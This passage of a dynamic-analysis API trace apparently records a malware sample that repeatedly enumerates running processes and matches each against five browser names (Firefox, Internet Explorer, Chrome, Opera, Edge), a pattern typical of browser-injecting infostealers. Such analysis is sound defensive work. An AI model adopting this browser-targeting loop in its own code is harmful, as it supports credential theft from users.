(lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.068] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0237.069] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0237.069] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0237.069] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0237.069] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0237.069] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.069] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0237.069] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0237.069] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0237.069] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0237.069] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0237.069] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.069] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0237.070] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0237.070] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0237.070] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0237.070] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0237.070] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.070] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0237.070] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0237.070] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0237.070] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0237.070] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0237.070] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.070] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0237.071] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0237.071] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0237.071] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0237.071] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0237.071] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.071] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0237.072] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0237.072] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0237.072] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0237.072] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0237.072] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.072] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0237.072] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0237.072] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0237.072] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0237.072] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0237.072] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.072] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0237.073] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0237.073] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0237.073] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0237.073] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0237.073] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.073] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.073] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0237.073] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0237.073] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0237.073] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0237.073] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.073] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.074] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.074] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.074] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.074] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0237.074] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.074] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0237.074] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0237.075] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0237.075] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0237.075] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0237.075] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.075] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.075] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.075] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.075] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.075] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0237.075] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.075] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0237.076] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0237.076] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0237.076] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0237.076] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0237.076] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.076] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.076] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0237.076] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0237.076] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0237.076] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0237.076] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.076] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0237.077] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0237.077] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0237.077] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0237.077] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0237.077] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.077] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.077] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0237.077] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0237.077] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0237.077] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0237.077] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.078] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.078] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0237.078] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0237.078] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0237.078] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0237.078] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.078] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.079] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0237.079] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0237.079] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0237.079] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0237.079] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.079] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.079] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0237.079] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0237.079] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0237.079] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0237.079] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.079] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.080] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0237.080] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0237.080] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0237.080] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0237.080] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.080] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0237.080] CloseHandle (hObject=0xe8) returned 1 [0237.080] Sleep (dwMilliseconds=0x3e8) [0238.089] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0238.090] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.091] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0238.091] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0238.091] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0238.091] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0238.091] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0238.091] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.091] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0238.091] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0238.091] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0238.092] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0238.092] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0238.092] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.092] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0238.092] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0238.092] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0238.092] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0238.092] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.092] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.093] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0238.093] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0238.093] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0238.093] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0238.093] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.093] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.093] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0238.093] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0238.093] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0238.093] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0238.093] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.093] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.094] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0238.094] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0238.094] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0238.094] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0238.094] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.094] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.094] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0238.094] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0238.095] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0238.095] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0238.095] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.095] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.095] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0238.095] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0238.095] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0238.095] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0238.095] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.095] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.096] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0238.096] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0238.096] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0238.096] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0238.096] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.096] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0238.096] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0238.096] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0238.097] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0238.097] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0238.097] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.097] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.097] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.097] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.097] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.097] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0238.097] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.097] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.098] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.098] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.098] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.098] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0238.098] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.098] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.098] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.098] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.098] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.098] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0238.098] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.098] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.099] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.099] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.099] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.099] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0238.099] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.099] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.099] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.099] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.099] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.099] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0238.099] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.099] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0238.100] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0238.100] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0238.100] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0238.100] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0238.100] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.100] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, 